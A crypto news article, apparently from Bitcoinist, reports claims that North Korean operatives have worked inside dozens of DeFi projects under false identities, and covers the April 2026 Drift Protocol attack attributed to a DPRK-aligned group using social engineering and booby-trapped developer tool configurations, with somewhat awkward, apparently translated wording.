Agents linked to North Korea have spent years quietly embedding themselves within crypto companies and DeFi projects.
A long-running crypto-infiltration saga
News and reports coming out of the Democratic People’s Republic of Korea tend to have a distinct conspiracy theory and action movie feel. However, they also tend to be true and not exaggerated at all.
This time, security researcher and MetaMask developer Taylor Monahan said in a post on social network
Yeahpppppp
Many DPRK computer scientists have been building the protocols you know and love since the Summer Challenge.
The “7 years of experience in blockchain development” on their CV is not a lie.
–Tay 💖 (@tayvano_) April 5, 2026
She claims that North Korean computer scientists have quietly worked on more than 40 DeFi projects over about seven years, including protocols that became known after the DeFi summer.
oh my god uhhhh like sushi, thorchain, yam, pickle, harvest, recover, swing, paid, naos, shezmu, qrolli, saffron, sifu, napier, harmony, blueberry, stabble, onering, elemental, divvy, la token, impermax, kira, cook, fantom, ankr, gamerse, metaplay, spice, beanstalk, deltaprime,…
–Tay 💖 (@tayvano_) April 5, 2026
These workers often have “real” on-chain experience (seven years of blockchain development) but operate under stolen or synthetic identities, connecting to teams through normal recruiting funnels.
His posts respond to Tim, a pseudonymous builder and public face of Titan, a DEX aggregation and routing project based in Solana, claiming that for a previous job they interviewed an extremely qualified candidate who turned out to be an agent of Lazarus, the North Korea-affiliated group that funneled billions of dollars of stolen money through cryptocurrency networks.
In a previous job, we interviewed someone who turned out to be an agent of Lazarus. he made video calls and was extremely skilled
we invited him for in-person interviews and he ultimately refused to fly, so we were successful
only later did we find his name in a Lazarus info dump…
—Tim | Titan (@timahhl) April 5, 2026
Famous crypto detective ZachXBT also responded to Tim’s post, explaining that it was not just “Lazarus”, but a network of DPRK units (Lazarus, APT38, AppleJeus, etc.) coordinated by the General Reconnaissance Bureau and optimized for financial cybercrime. Their methods rely on “basic and hard” outreach via LinkedIn, job boards, interviews, Zoom, as well as remote development roles that teams still grant far too easily.
Lazarus Group is the collective name for all state-sponsored cyber actors in the DPRK.
The main problem is that everyone lumps them together when the complexity of the threats is different.
Threats via job postings, LinkedIn, emails, Zoom or interviews are basic and under no circumstances… pic.twitter.com/NL8Jck5edN
-ZachXBT (@zachxbt) April 5, 2026
Recent sanctions from the US Treasury Department’s Office of Foreign Assets Control (OFAC) and findings from Chainalysis indicate that the DPRK’s computer networks generated $800 million in 2024 alone and moved billions in stolen crypto since 2017, fueling weapons of mass destruction (WMD) and missile programs.
New information about the Crypto-Hack On Drift protocol
The April 1 attack on the $285 million Drift Protocol reignited fears about insider threats from North Korea, particularly after the protocol itself confirmed Saturday that speculation linking the attack to North Korean hacking groups was true.
– Drift (@DriftProtocol) April 5, 2026
They attributed the attack “with medium confidence” to UNC4736, a North Korea-aligned and state-sponsored hacking group.
The protocol claimed that the attackers relied on a well-crafted social engineering strategy: fake professional personas, in-person conference interactions, and booby-trapped developer tools to compromise contributors before ultimately executing the exploit. The attackers posed as a legitimate business company, met in person with Drift contributors in multiple countries, and used entirely constructed identities with professional backgrounds and professional networks before triggering the exploit.
The attackers used common development tools by inserting malicious tasks into VS Code and Cursor configurations, providing a compromised repository that contributors were running locally without realizing it. All of these elements combined make the incident look much more like an internal-style supply chain compromise than a simple smart contract.
The day after the attack, Ledger CTO Charles Guillement linked the attack method to the $1.4 billion Bybit hack attributed to the regime’s cyber units. Then, on Friday, blockchain analytics firm Elliptic released a survey claiming that on-chain behavior, laundering methods, and network-level indicators match techniques seen in previous DPRK-related operations. Bitcoinist covered the story.
Market implications
This crypto hacking saga has transformed into a structural national security risk. Regulators and sanctions agencies are already getting stricter around the DPRK’s computer networks, and more aggressive enforcement will likely follow.
Large state-linked exploits create latent protocol risk: higher insurance premiums, potential delistings, governance infighting over restitution, and longer risk aversion periods for DeFi tokens and perp volumes.
At the moment of writing, BTC trades for the highs $69k on the daily chart. Source: BTCUSDT on Tradingview.
Cover image of Perplexity. BTCUSDT chart from Tradingview.
Editorial process as Bitcoinist focuses on providing thoroughly researched, accurate and unbiased content. We follow strict sourcing standards and every page undergoes careful review by our team of top technology experts and seasoned editors. This process ensures the integrity, relevance and value of our content to our readers.
